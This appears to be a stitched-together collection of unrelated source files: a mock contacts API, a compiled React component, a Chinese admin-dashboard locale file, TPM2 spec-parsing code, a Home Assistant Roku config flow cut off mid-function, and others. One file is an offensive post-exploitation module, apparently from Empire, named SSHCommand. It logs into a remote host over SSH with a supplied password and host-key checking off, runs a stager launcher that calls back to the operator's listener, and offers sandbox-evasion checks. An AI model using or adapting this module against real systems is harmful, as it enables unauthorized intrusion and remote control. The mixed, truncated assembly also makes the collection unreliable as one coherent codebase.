// return data[0];
res.send({"result": data[0]});
};
var getDetails = function (data, id) {
for (var i = 0; i < data.length; i++)
{
if (data[i].id == id)
{
return data[i];
}
}
};
exports.updateContactById = function (req, res, next) {
// var id = data.id;
// Do update operation
// return true;
res.send({"result": true});
};
exports.deleteContactById = function (req, res, next) {
// var id = data.id;
// Do update operation
// return true;
res.send({"result": true});
};
exports.deleteLeadById = function (req, res, next) {
// var id = data.id;
// Do update operation
res.send({"result": true});
};
exports.getLeads = function (req, res, next) {
var data = [
{
"id": 10247,
"name": "Marc Barnes",
"email": "[email protected]",
"contact": "(382) 122-5003"
},
{
"id": 10248,
"name": "Glen Curtis",
"email": "[email protected]",
"contact": "(477) 981-4948"
},
{
"id": 10249,
"name": "Beverly Gonzalez",
"email": "[email protected]",
"contact": "(832) 255-5161"
},
{
"id": 10250,
"name": "Yvonne Chavez",
"email": "[email protected]",
"contact": "(477) 446-3715"
},
{
"id": 10251,
"name": "Melinda Mitchelle",
"email": "[email protected]",
"contact": "(813) 716-4996"
},
{
"id": 10252,
"name": "Shannon Bradley",
"email": "[email protected]",
"contact": "(774) 291-9928"
},
{
"id": 10253,
"name": "Virgil Kim",
"email": "[email protected]",
"username": "VirgilKim",
"contact": "(219) 181-7898"
},
{
"id": 10254,
"name": "Letitia Robertson",
"email": "[email protected]",
"username": "Letitia Robertson",
"contact": "(647) 209-4589"
},
{
"id": 10255,
"name": "Claude King",
"email": "[email protected]",
"username": "ClaudeKing",
"contact": "(657) 988-8701"
},
{
"id": 10256,
"name": "Roland Craig",
"email": "[email protected]",
"username": "RolandCraig",
"contact": "(932) 935-9471"
},
{
"id": 10257,
"name": "Colleen Parker",
"email": "[email protected]",
"username": "ColleenParker",
"contact": "(857) 459-2792"
},
{
"id": 10258,
"name": "Leah Jensen",
"email": "[email protected]",
"username": "LeahJensen",
"contact": "(861) 275-4686"
},
{
"id": 10259,
"name": "Harold Martinez",
"email": "[email protected]",
"username": "HaroldMartinez",
"contact": "(836) 634-9133"
},
{
"id": 10260,
"name": "Keith Lowe",
"email": "[email protected]",
"username": "KeithLowe",
"contact": "(778) 787-3100"
},
{
"id": 10261,
"name": "Charles Walker",
"email": "[email protected]",
"username": "CharlesWalker",
"contact": "(486) 440-4716"
},
{
"id": 10262,
"name": "Lillie Curtis",
"email": "[email protected]",
"username": "LillieCurtis",
"contact": "(342) 510-2258"
},
{
"id": 10263,
"name": "Genesis Reynolds",
"email": "[email protected]",
"username": "GenesisReynolds",
"contact": "(339) 375-1858"
},
{
"id": 10264,
"name": "Oscar Palmer",
"email": "[email protected]",
"username": "OscarPalmer",
"contact": "(544) 270-9912"
},
{
"id": 10265,
"name": "Lillie Lead",
"email": "[email protected]",
"contact": "(342) 510-2258"
},
{
"id": 10266,
"name": "Genesis Lead",
"email": "[email protected]",
"contact": "(339) 375-1858"
},
{
"id": 10267,
"name": "Oscar Lead",
"email": "[email protected]",
"contact": "(544) 270-9912"
},
{
"id": 10268,
"name": "Lena Lead",
"email": "[email protected]",
"contact": "(177) 521-1556"
},
{
"id": 10269,
"name": "Kent Lead",
"email": "[email protected]",
"contact": "(506) 533-6801"
}
];
// return data;
res.send({"result": data});
};
//module.exports.x = x;
//module.exports.addX = addX;
////module.exports.getContacts = getContacts;
//module.exports.getContactDetailsById = getContactDetailsById;
//module.exports.updateContactById = updateContactById;
//module.exports.getContactsDetails = getContactsDetails;
//module.exports.deleteContactById = deleteContactById;
//module.exports.deleteLeadById = deleteLeadById;
//module.exports.getLeads = getLeads; |
export { default } from './SubjectSetStore' |
"use strict";
require("core-js/modules/es.array.iterator.js");
require("core-js/modules/es.weak-map.js");
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.ChoicesComponent = ChoicesComponent;
exports.choices = choices;
var _react = _interopRequireWildcard(require("react"));
var _helpers = require("../../_helpers");
var _choicesList = require("./components/choices-list");
var _useChoicesNavigation = require("./use-choices-navigation");
var _useNumericInputHandler = require("./use-numeric-input-handler");
function _getRequireWildcardCache(nodeInterop) { if (typeof WeakMap !== "function") return null; var cacheBabelInterop = new WeakMap(); var cacheNodeInterop = new WeakMap(); return (_getRequireWildcardCache = function _getRequireWildcardCache(nodeInterop) { return nodeInterop ? cacheNodeInterop : cacheBabelInterop; })(nodeInterop); }
function _interopRequireWildcard(obj, nodeInterop) { if (!nodeInterop && obj && obj.__esModule) { return obj; } if (obj === null || typeof obj !== "object" && typeof obj !== "function") { return { default: obj }; } var cache = _getRequireWildcardCache(nodeInterop); if (cache && cache.has(obj)) { return cache.get(obj); } var newObj = {}; var hasPropertyDescriptor = Object.defineProperty && Object.getOwnPropertyDescriptor; for (var key in obj) { if (key !== "default" && Object.prototype.hasOwnProperty.call(obj, key)) { var desc = hasPropertyDescriptor ? Object.getOwnPropertyDescriptor(obj, key) : null; if (desc && (desc.get || desc.set)) { Object.defineProperty(newObj, key, desc); } else { newObj[key] = obj[key]; } } } newObj.default = obj; if (cache) { cache.set(obj, newObj); } return newObj; }
function ChoicesComponent({
message,
isNumericInputEnabled,
items,
onSubmit
}) {
const highlightedItem = (0, _useChoicesNavigation.useChoicesNavigation)(items);
const submitResult = (0, _react.useCallback)(() => {
onSubmit(highlightedItem.value);
}, [highlightedItem, onSubmit]);
const handleNumericInput = (0, _react.useCallback)(item => {
if (!isNumericInputEnabled) {
return;
}
onSubmit(item.value);
}, [isNumericInputEnabled, onSubmit]);
(0, _helpers.useEnterKeyHandler)(submitResult);
(0, _useNumericInputHandler.useNumericInputHandler)({
items,
onNumericInput: handleNumericInput
});
return /*#__PURE__*/_react.default.createElement(_react.default.Fragment, null, message && /*#__PURE__*/_react.default.createElement(_helpers.Question, {
message: message
}), /*#__PURE__*/_react.default.createElement(_choicesList.ChoicesList, {
items: items,
highlightedItem: highlightedItem,
isNumericInputEnabled: isNumericInputEnabled
}));
}
function choices({
message,
isNumericInputEnabled = false,
items
}) {
if (isNumericInputEnabled && items.length > 9) {
throw new Error('If isNumericInputEnabled is true, the length of choices must be less than 10');
}
return onSubmit => /*#__PURE__*/_react.default.createElement(ChoicesComponent, {
message: message,
isNumericInputEnabled: isNumericInputEnabled,
items: items,
onSubmit: onSubmit
});
} |
// import zhMessages from '../../locales/zh.json';
export default {
'navbar.lang': 'English',
'menu.home': '首页',
'menu.dashboard': '本站新闻',
'menu.dashboard.analysis': '公告',
'menu.dashboard.monitor': '消息',
'menu.dashboard.workplace': '个人资料',
'menu.form': '我的课程',
'menu.course': '课程详情',
'menu.course.grade': '评分',
'menu.course.courseDetail': '课程详情',
'menu.form.basicform': '2018年秋季',
'menu.form.stepform': '2018年春季',
'menu.form.stepform.info': '分步表单(填写转账信息)',
'menu.form.stepform.confirm': '分步表单(确认转账信息)',
'menu.form.stepform.result': '分步表单(完成)',
'menu.form.advancedform': '2017年秋季',
'menu.form.addCourse': '添加课程',
'menu.form.testform': '测试',
'menu.manage-course': '课程管理',
'menu.manage-course.addCourse': '添加课程',
'menu.manage-course.myClass': '我的班级',
'menu.manage-course.manageCourse': '课程管理',
'menu.managerUser':'用户管理',
'menu.list': '列表页',
'menu.list.searchtable': '查询表格',
'menu.list.basiclist': '标准列表',
'menu.list.cardlist': '卡片列表',
'menu.list.searchlist': '搜索列表',
'menu.list.searchlist.articles': '搜索列表(文章)',
'menu.list.searchlist.projects': '搜索列表(项目)',
'menu.list.searchlist.applications': '搜索列表(应用)',
'menu.profile': '详情页',
'menu.profile.basic': '基础详情页',
'menu.profile.advanced': '高级详情页',
'menu.result': '结果页',
'menu.result.success': '成功页',
'menu.result.fail': '失败页',
'menu.exception': '异常页',
'menu.exception.not-permission': '403',
'menu.exception.not-find': '404',
'menu.exception.server-error': '500',
'menu.exception.trigger': '触发错误',
'menu.account': '个人页',
'menu.account.settings': '设置',
'menu.account.center': '个人中心',
'menu.account.discuss': '讨论区帖子',
'menu.account.detail': '帖子详情',
'menu.account.trigger': '触发报错',
'menu.account.analysis': '消息',
'menu.compiler': '在线编译',
'app.home.introduce': '介绍',
'app.analysis.test': '工专路 {no} 号店',
'app.analysis.introduce': '指标说明',
'app.analysis.total-sales': '总销售额',
'app.analysis.day-sales': '日销售额',
'app.analysis.visits': '访问量',
'app.analysis.visits-trend': '访问量趋势',
'app.analysis.visits-ranking': '门店访问量排名',
'app.analysis.day-visits': '日访问量',
'app.analysis.week': '周同比',
'app.analysis.day': '日同比',
'app.analysis.payments': '支付笔数',
'app.analysis.conversion-rate': '转化率',
'app.analysis.operational-effect': '运营活动效果',
'app.analysis.sales-trend': '销售趋势',
'app.analysis.sales-ranking': '门店销售额排名',
'app.analysis.all-year': '全年',
'app.analysis.all-month': '本月',
'app.analysis.all-week': '本周',
'app.analysis.all-day': '今日',
'app.analysis.search-users': '搜索用户数',
'app.analysis.per-capita-search': '人均搜索次数',
'app.analysis.online-top-search': '线上热门搜索',
'app.analysis.the-proportion-of-sales': '销售额类别占比',
'app.analysis.channel.all': '全部渠道',
'app.analysis.channel.online': '线上',
'app.analysis.channel.stores': '门店',
'app.analysis.sales': '销售额',
'app.analysis.traffic': '客流量',
'app.analysis.table.rank': '排名',
'app.analysis.table.search-keyword': '搜索关键词',
'app.analysis.table.users': '用户数',
'app.analysis.table.weekly-range': '周涨幅',
'app.settings.menuMap.basic': '基本设置',
'app.settings.menuMap.security': '安全设置',
'app.settings.menuMap.binding': '账号绑定',
'app.settings.menuMap.notification': '新消息通知',
'app.settings.basic.avatar': '更换头像',
'app.settings.basic.email': '邮箱',
'app.settings.basic.email-message': '请输入您的邮箱!',
'app.settings.basic.nickname': '昵称',
'app.settings.basic.nickname-message': '请输入您的昵称!',
'app.settings.basic.profile': '个人简介',
'app.settings.basic.profile-message': '请输入个人简介!',
'app.settings.basic.profile-placeholder': '个人简介',
'app.settings.basic.country': '国家/地区',
'app.settings.basic.country-message': '请输入您的国家或地区!',
'app.settings.basic.geographic': '所在省市',
'app.settings.basic.geographic-message': '请输入您的所在省市!',
'app.settings.basic.address': '街道地址',
'app.settings.basic.address-message': '请输入您的街道地址!',
'app.settings.basic.phone': '联系电话',
'app.settings.basic.phone-message': '请输入您的联系电话!',
'app.settings.basic.update': '更新基本信息',
'app.settings.security.strong': '强',
'app.settings.security.medium': '中',
'app.settings.security.weak': '弱',
'app.settings.security.password': '账户密码',
'app.settings.security.password-description': '当前密码强度:',
'app.settings.security.phone': '密保手机',
'app.settings.security.phone-description': '已绑定手机:',
'app.settings.security.question': '密保问题',
'app.settings.security.question-description': '未设置密保问题,密保问题可有效保护账户安全',
'app.settings.security.email': '备用邮箱',
'app.settings.security.email-description': '已绑定邮箱:',
'app.settings.security.mfa': 'MFA 设备',
'app.settings.security.mfa-description': '未绑定 MFA 设备,绑定后,可以进行二次确认',
'app.settings.security.modify': '修改',
'app.settings.security.set': '设置',
'app.settings.security.bind': '绑定',
'app.settings.binding.taobao': '绑定淘宝',
'app.settings.binding.taobao-description': '当前未绑定淘宝账号',
'app.settings.binding.alipay': '绑定支付宝',
'app.settings.binding.alipay-description': '当前未绑定支付宝账号',
'app.settings.binding.dingding': '绑定钉钉',
'app.settings.binding.dingding-description': '当前未绑定钉钉账号',
'app.settings.binding.bind': '绑定',
'app.settings.notification.password': '账户密码',
'app.settings.notification.password-description': '其他用户的消息将以站内信的形式通知',
'app.settings.notification.messages': '系统消息',
'app.settings.notification.messages-description': '系统消息将以站内信的形式通知',
'app.settings.notification.todo': '账户密码',
'app.settings.notification.todo-description': '账户密码',
'app.settings.open': '开',
'app.settings.close': '关',
'app.exception.back': '返回首页',
'app.exception.description.403': '抱歉,你无权访问该页面',
'app.exception.description.404': '抱歉,你访问的页面不存在',
'app.exception.description.500': '抱歉,服务器出错了',
'app.result.error.title': '提交失败',
'app.result.error.description': '请核对并修改以下信息后,再重新提交。',
'app.result.error.hint-title': '您提交的内容有如下错误:',
'app.result.error.hint-text1': '您的账户已被冻结',
'app.result.error.hint-btn1': '立即解冻',
'app.result.error.hint-text2': '您的账户还不具备申请资格',
'app.result.error.hint-btn2': '立即升级',
'app.result.error.btn-text': '返回修改',
'app.result.success.title': '提交成功',
'app.result.success.description':
'提交结果页用于反馈一系列操作任务的处理结果, 如果仅是简单操作,使用 Message 全局提示反馈即可。 本文字区域可以展示简单的补充说明,如果有类似展示 “单据”的需求,下面这个灰色区域可以呈现比较复杂的内容。',
'app.result.success.operate-title': '项目名称',
'app.result.success.operate-id': '项目 ID:',
'app.result.success.principal': '负责人:',
'app.result.success.operate-time': '生效时间:',
'app.result.success.step1-title': '创建项目',
'app.result.success.step1-operator': '曲丽丽',
'app.result.success.step2-title': '部门初审',
'app.result.success.step2-operator': '周毛毛',
'app.result.success.step2-extra': '催一下',
'app.result.success.step3-title': '财务复核',
'app.result.success.step4-title': '完成',
'app.result.success.btn-return': '返回列表',
'app.result.success.btn-project': '查看项目',
'app.result.success.btn-print': '打印',
'app.setting.pagestyle': '整体风格设置',
'app.setting.pagestyle.dark': '暗色菜单风格',
'app.setting.pagestyle.light': '亮色菜单风格',
'app.setting.content-width': '内容区域宽度',
'app.setting.content-width.fixed': '定宽',
'app.setting.content-width.fluid': '流式',
'app.setting.themecolor': '主题色',
'app.setting.themecolor.dust': '薄暮',
'app.setting.themecolor.volcano': '火山',
'app.setting.themecolor.sunset': '日暮',
'app.setting.themecolor.cyan': '明青',
'app.setting.themecolor.green': '极光绿',
'app.setting.themecolor.daybreak': '拂晓蓝(默认)',
'app.setting.themecolor.geekblue': '极客蓝',
'app.setting.themecolor.purple': '酱紫',
'app.setting.navigationmode': '导航模式',
'app.setting.sidemenu': '侧边菜单布局',
'app.setting.topmenu': '顶部菜单布局',
'app.setting.fixedheader': '固定 Header',
'app.setting.fixedsidebar': '固定侧边菜单',
'app.setting.fixedsidebar.hint': '侧边菜单布局时可配置',
'app.setting.hideheader': '下滑时隐藏 Header',
'app.setting.hideheader.hint': '固定 Header 时可配置',
'app.setting.othersettings': '其他设置',
'app.setting.weakmode': '色弱模式',
'app.setting.copy': '拷贝设置',
'app.setting.copyinfo': '拷贝成功,请到 src/defaultSettings.js 中替换默认配置',
'app.setting.production.hint':
'配置栏只在开发环境用于预览,生产环境不会展现,请拷贝后手动修改配置文件',
};
|
from data.fields.abstract import AbstractField
from data.scrape.fields.targets import TARGETS, GUIDELINE_TARGETS, EQUATOR_TARGET
class HasAny(AbstractField):
def __init__(self, name, field_names):
self.name = "has_" + name.lower()
self.field_names = field_names
def apply_to_dataframe(self, df):
df[self.name] = df.apply(self.has_any, axis=1)
def has_any(self, df):
return any([df[name] for name in self.field_names])
POSTPROCESSED_FIELDS = [
HasAny(target.name, [field.name for field in target.fields]) for target in TARGETS
]
HAS_EQUATOR = HasAny("EQUATOR", [field.name for field in EQUATOR_TARGET.fields])
HAS_ANY_GUIDELINES = HasAny(
"Guidelines",
[field.name for target in GUIDELINE_TARGETS for field in target.fields],
)
POSTPROCESSED_FIELDS.append(HAS_EQUATOR)
POSTPROCESSED_FIELDS.append(HAS_ANY_GUIDELINES)
|
/**
* Created by kras on 27.12.16.
*/
'use strict';
function ReportMetaRepository() {
/**
*
* @returns {Promise}
*/
this.init = function () {
return this._init();
};
/**
*
* @param {String} [namespace]
* @returns {DataMine[]}
*/
this.getDataMines = function (namespace) {
return this._getDataMines(namespace);
};
/**
*
* @param {String} name
* @param {String} [namespace]
* @returns {DataMine | null}
*/
this.getDataMine = function (name, namespace) {
return this._getDataMine(name, namespace);
};
this.getNavigationNodes = function (parent, namespace) {
return this._getNavigationNodes(parent, namespace);
};
this.getNavigationNode = function (code, namespace) {
return this._getNavigationNode(code, namespace);
};
}
module.exports = ReportMetaRepository;
|
from __future__ import print_function
from builtins import object
from lib.common import helpers
class Module(object):
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'SSHCommand',
# list of one or more authors for the module
'Author': ['@424f424f'],
# more verbose multi-line description of the module
'Description': 'This module will send an launcher via ssh.',
# True if the module needs to run in the background
'Background' : True,
# File extension to save the file as
'OutputExtension' : "",
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : True,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': [
'http://stackoverflow.com/questions/17118239/how-to-give-subprocess-a-password-and-get-stdout-at-the-same-time'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to use ssh from.',
'Required' : True,
'Value' : ''
},
'Login' : {
'Description' : '[email protected]',
'Required' : True,
'Value' : ''
},
'Password' : {
'Description' : 'Password',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'SafeChecks' : {
'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
'Required' : True,
'Value' : 'True'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
login = self.options['Login']['Value']
password = self.options['Password']['Value']
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
safeChecks = self.options['SafeChecks']['Value']
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', userAgent=userAgent, safeChecks=safeChecks)
launcher = launcher.replace("'", "\\'")
launcher = launcher.replace('"', '\\"')
if launcher == "":
print(helpers.color("[!] Error in launcher command generation."))
return ""
script = """
import os
import pty
def wall(host, pw):
import os,pty
pid, fd = pty.fork()
if pid == 0:
os.execvp('ssh', ['ssh', '-o StrictHostKeyChecking=no', host, '%s'])
os._exit(1)
os.read(fd, 1024)
os.write(fd, '\\n' + pw + '\\n')
result = []
while True:
try:
data = os.read(fd, 1024)
if data[:8] == "Password" and data[-1:] == ":":
os.write(fd, pw + '\\n')
except OSError:
break
if not data:
break
result.append(data)
pid, status = os.waitpid(pid, 0)
return status, ''.join(result)
status, output = wall('%s','%s')
print status
print output
""" % (launcher, login, password)
return script
|
//-------------------------------------------------------------------------------------------------
// <copyright file="regutil.h" company="Microsoft">
// Copyright (c) Microsoft Corporation. All rights reserved.
//
// The use and distribution terms for this software are covered by the
// Common Public License 1.0 (http://opensource.org/licenses/cpl1.0.php)
// which can be found in the file CPL.TXT at the root of this distribution.
// By using this software in any fashion, you are agreeing to be bound by
// the terms of this license.
//
// You must not remove this notice, or any other, from this software.
// </copyright>
//
// <summary>
// Registry helper functions.
// </summary>
//-------------------------------------------------------------------------------------------------
#pragma once
#ifdef __cplusplus
extern "C" {
#endif
#define ReleaseRegKey(h) if (h) { ::RegCloseKey(h); h = NULL; }
#ifdef __cplusplus
}
#endif
|
def query():
sql = '''SELECT Field_1 FROM Table_1 '''
return sql |
# -*- coding: utf-8 -*-
import re
from modules import data_structures
from modules import utils
from modules.extractors.pdf.tpm2_partx_extraction_navigator_pdf import ExtractionNavigator
import settings
class SptRoutinesPDF(ExtractionNavigator):
def handle_cryptographic_functions(self, file, sub_path, section_number, sub_section_number):
function = ""
sub_sub_section_number = 0
while not (section_number + "\." + str(sub_section_number + 1) in function and (function.strip().endswith(".c") or function.strip().endswith(".h"))):
sub_sub_section_number += 1
regex = "\n[ ]*" + section_number + "\." + str(sub_section_number) + "\." + str(sub_sub_section_number) + "[ ]*(.*\.c|.*\.h)"
result = re.search(regex, file)
if result:
function = result.group(1)
print " * " + function.strip()
else:
break
f = self.extract_code_blocks_cryptographic_functions(file, section_number, sub_section_number, sub_sub_section_number)
f.name = function.strip()
f.short_name = f.name[:-2]
f.file_name = f.name.replace("()", ".c")
f.folder_name = sub_path
self.functions.append(f)
# Extract support routine code blocks
# Parameters;
# file
# section_number
# sub_section_number
# Returns:
# list of code blocks found in given part of file
def extract_code_blocks(self, file, section_number, sub_section_number):
code_blocks = data_structures.TPM2_Partx_File()
###################################################################
# FUNCTIONS BLOCKS (START)
code_found = False
table_found = False
code_offset = 0
while True:
line = file.readline()[:-1]
if line == "":
continue
# end of page, either break, or calculate new offsets
if "Page" in line and "Family" in line:
for i in range(0, 5):
line = file.readline()[:-1]
if re.search("Part[ ]+4:", line):
code_offset = len(re.search("\f([ ]*).*", line).group(1))
if "Annex" in line:
return code_blocks
if line.strip().startswith(section_number + "." + str(int(sub_section_number) +1)):
break
if (line.startswith(" ") and str(int(section_number) + 1) + " " in line.strip()
and not section_number + "." + str(sub_section_number) in line):
file.seek(file.tell() - len(line))
break
result1 = re.search("^(\d{1,4}[ ]*)(.*)", line)
if result1:
code_found = True
table_found = False
if code_offset == 0:
code_offset = len(result1.group(1))
code_line = line[code_offset:]
code_blocks.append(data_structures.TPM2_Partx_CodeLine(code_line))
result2 = re.search("([ ]*Error Returns[ ]+Meaning.*)", line)
if result2:
table_found = True
row = result2.group(1)+"\n"
results = re.split("[ ]{5,}", row)
offsets = []
l = []
for r in results:
r = r.strip()
l.append(r)
offsets.append(line.find(r))
code_blocks.append(data_structures.TPM2_Partx_Table(None, None, None, l))
elif table_found:
row = line + "\n"
row = utils.split_row(row, offsets)
code_blocks.elements[len(code_blocks.elements)-1].append(row)
elif line.strip().startswith(section_number + "." + str(int(sub_section_number) +1)):
break
result2 = re.search("^[ ]{2,}(.*)", line)
if not (table_found or code_found) and result2:
code_blocks.append(data_structures.TPM2_Partx_CommentLine(result2.group(1)))
if not (result1 or result2):
break
# FUNCTIONS BLOCKS (END)
###################################################################
return code_blocks
# Extract next function from file
# Parameters;
# file
# section_number
# sub_section_number
# Returns:
# string containing function
# sub_section_number
def next_function(self, file, section_number, sub_section_number):
function = ""
if settings.SPEC_VERSION_INT == 138:
result = re.search("\n[ ]*" + section_number + "\." + str(sub_section_number) + "[ ]+(.*?[^.\d]{2,})\n", file)
else:
result = re.search("\n[ ]*" + section_number + "\." + str(sub_section_number) + "[ ]+(.*?[^.\d]{2,}(.c|.h|\(.*?\)))\n", file)
if result:
function = result.group(1)
file.seek(result.end())
while not (function.strip().endswith(".c") or function.strip().endswith(")") or "Headers" in function or "Source" in function):
sub_section_number += 1
if settings.SPEC_VERSION_INT == 138:
result = re.search("\n[ ]*" + section_number + "\." + str(sub_section_number) + "[ ]+(.*?[^.\d]{2,})\n", file)
else:
result = re.search("\n[ ]*" + section_number + "\." + str(sub_section_number) + "[ ]+(.*?[^.\d]{2,}(.c|.h|\(.*?\)))\n", file)
if result:
function = result.group(1)
file.seek(result.end())
else:
return None, None
return function, sub_section_number
# Append all functions from file to the list of functions
# Parameters;
# file
# section_number
# sub_path
def extract_function(self, file, section_number, sub_path):
sub_section_number = 1
function, sub_section_number = self.next_function(file, section_number, sub_section_number) # find first function entry
while function is not None: # iterate over function entries
print " * " + function.strip()
if section_number == "10" and ("Headers" in function or "Source" in function):
self.handle_cryptographic_functions(file, sub_path, section_number, sub_section_number)
sub_section_number += 1
function, sub_section_number = self.next_function(file, section_number, sub_section_number) # find next function entry
continue
f = self.extract_code_blocks(file, section_number, sub_section_number)
if "CommandDispatcher()" in function:
f.file_name = "CommandDispatcher_fp.h"
f.name = "CommandDispatcher_fp.h"
f.short_name = "CommandDispatcher"
f.folder_name = sub_path
elif "ParseHandleBuffer()" in function:
f.file_name = "HandleProcess_fp.h"
f.name = "HandleProcess_fp.h"
f.short_name = "HandleProcess"
f.folder_name = sub_path
elif "Marshal.c" in function:
sub_section_number += 1
function, sub_section_number = self.next_function(file, section_number, sub_section_number) # find next function entry
continue
else:
result = re.search(".*?\((.*?)\)", function)
if result:
f.file_name = result.group(1)
f.name = result.group(1)
else:
f.file_name = function.strip().replace("()", ".c")
f.name = function.strip()
f.short_name = f.name[:-2]
f.folder_name = sub_path
self.functions.append(f)
sub_section_number += 1
function, sub_section_number = self.next_function(file, section_number, sub_section_number) # find next function entry
# Extract support routine annex code blocks
# Parameters;
# file
# section_number
# sub_section_number
# Returns:
# list of code blocks found in given part of file
def extract_code_blocks_cryptographic_functions(self, file, section_number, sub_section_number, sub_sub_section_number=None):
code_blocks = data_structures.TPM2_Partx_File()
###################################################################
# FUNCTIONS BLOCKS (START)
code_found = False
table_found = False
code_offset = 0
while True:
line = file.readline()[:-1]
if line == "":
continue
# end of page, either break, or calculate new offsets
if "Page" in line and "Family" in line:
for i in range(0, 5):
line = file.readline()
if "Part 4: Supporting Routines" in line:
result1 = re.search("([ ]+)(.*)\n", line)
if result1:
code_offset = len(result1.group(1))
if line.strip().startswith(section_number + "." + str(int(sub_section_number) +1)):
file.seek(file.tell() - len(line))
break
if sub_sub_section_number and line.strip().startswith(section_number + "." + str(sub_section_number) + "." + str(int(sub_sub_section_number) +1)):
break
result1 = re.search("^(\d{1,4})(.*)", line)
if result1:
code_found = True
table_found = False
line_number = result1.group(1)
code_line = result1.group(2)
if code_offset == 0:
code_line = code_line.strip()
code_offset = max(line.find(code_line), len(line_number) + 2)
else:
code_line = code_line[code_offset-len(line_number):]
code_blocks.append(data_structures.TPM2_Partx_CodeLine(code_line))
result2 = re.search("([ ]*Error Returns[ ]+Meaning.*)", line)
if result2:
table_found = True
row = result2.group(1)+"\n"
results = re.split("[ ]{5,}", row)
offsets = []
l = []
for r in results:
r = r.strip()
l.append(r)
offsets.append(line.find(r))
code_blocks.append(data_structures.TPM2_Partx_Table(None, None, None, l))
elif table_found:
row = line + "\n"
row = utils.split_row(row, offsets)
code_blocks.elements[len(code_blocks.elements)-1].append(row)
elif line.strip().startswith(section_number + "." + str(int(sub_section_number) +1)):
break
elif sub_sub_section_number and line.strip().startswith(section_number + "." + str(sub_section_number) + "." + str(int(sub_sub_section_number) + 1)):
break
result2 = re.search("^[ ]{2,}(.*)", line)
if not (table_found or code_found) and result2:
code_blocks.append(data_structures.TPM2_Partx_CommentLine(""))
code_blocks.append(data_structures.TPM2_Partx_CommentLine(result2.group(1)))
# reset code status for comments
code_found = False
if not (result1 or result2):
break
# FUNCTIONS BLOCKS (END)
###################################################################
return code_blocks
|
"""Config flow for Roku."""
import logging
from typing import Any, Dict, Optional
from urllib.parse import urlparse
from rokuecp import Roku, RokuError
import voluptuous as vol
from homeassistant.components.ssdp import (
ATTR_SSDP_LOCATION,
ATTR_UPNP_FRIENDLY_NAME,
ATTR_UPNP_SERIAL,
)
from homeassistant.config_entries import CONN_CLASS_LOCAL_POLL, ConfigFlow
from homeassistant.const import CONF_HOST, CONF_NAME
from homeassistant.core import callback
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.helpers.typing import HomeAssistantType
from .const import DOMAIN # pylint: disable=unused-import
DATA_SCHEMA = vol.Schema({vol.Required(CONF_HOST): str})
ERROR_CANNOT_CONNECT = "cannot_connect"
ERROR_UNKNOWN = "unknown"
_LOGGER = logging.getLogger(__name__)
async def validate_input(hass: HomeAssistantType, data: Dict) -> Dict:
"""Validate the user input allows us to connect.
Data has the keys from DATA_SCHEMA with values provided by the user.
"""
session = async_get_clientsession(hass)
roku = Roku(data[CONF_HOST], session=session)
device = await roku.update()
return {
"title": device.info.name,
"serial_number": device.info.serial_number,
}
class RokuConfigFlow(ConfigFlow, domain=DOMAIN):
"""Handle a Roku config flow."""
VERSION = 1
CONNECTION_CLASS = CONN_CLASS_LOCAL_POLL
def __init__(self):
"""Set up the instance."""
self.discovery_info = {}
@callback
def _show_form(self, errors: Optional[Dict] = None) -> Dict[str, Any]:
"""Show the form to the user."""
return self.async_show_form(
step_id="user",
data_schema=DATA_SCHEMA,
errors=errors or {},
)
async def async_step_user(
self, user_input: Optional[Dict] = None
) -> Dict[str, Any]:
"""Handle a flow initialized by the user."""
if not user_input:
return self._show_form()
errors = {}
try:
info = await validate_input(self.hass, user_input)
except RokuError:
_LOGGER.debug("Roku Error", exc_info=True)
errors["base"] = ERROR_CANNOT_CONNECT
return self._show_form(errors)
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Unknown error trying to connect")
return self.async_abort(reason=ERROR_UNKNOWN)
await self.async_set_unique_id(info["serial_number"])
self._abort_if_unique_id_configured(updates={CONF_HOST: user_input[CONF_HOST]})
return self.async_create_entry(title=info["title"], data=user_input)
async def async_step_homekit(self, discovery_info):
"""Handle a flow initialized by homekit discovery."""
# If we already have the host configured do
# not open connections to it if we can avoid it.
if self._host_already_configured(discovery_info[CONF_HOST]):
return self.async_abort(reason="already_configured")
self.discovery_info.update({CONF_HOST: discovery_info[CONF_HOST]})
try:
info = await validate_input(self.hass, self.discovery_info)
except RokuError:
_LOGGER.debug("Roku Error", exc_info=True)
return self.async_abort(reason=ERROR_CANNOT_CONNECT)
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Unknown error trying to connect")
return self.async_abort(reason=ERROR_UNKNOWN)
await self.async_set_unique_id(info["serial_number"])
self._abort_if_unique_id_configured(
updates={CONF_HOST: discovery_info[CONF_HOST]},
)
# pylint: disable=no-member # https://github.com/PyCQA/pylint/issues/3167
self.context.update({"title_placeholders": {"name": info["title"]}})
self.discovery_info.update({CONF_NAME: info["title"]})
return await self.async_step_discovery_confirm()
async def async_step_ssdp(
self, discovery_info: Optional[Dict] = None
) -> Dict[str, Any]:
"""Handle a flow initialized by discovery."""
host = urlparse(discovery_info[ATTR_SSDP_LOCATION]).hostname
name = discovery_info[ATTR_UPNP_FRIENDLY_NAME]
serial_number = discovery_info[ATTR_UPNP_SERIAL]
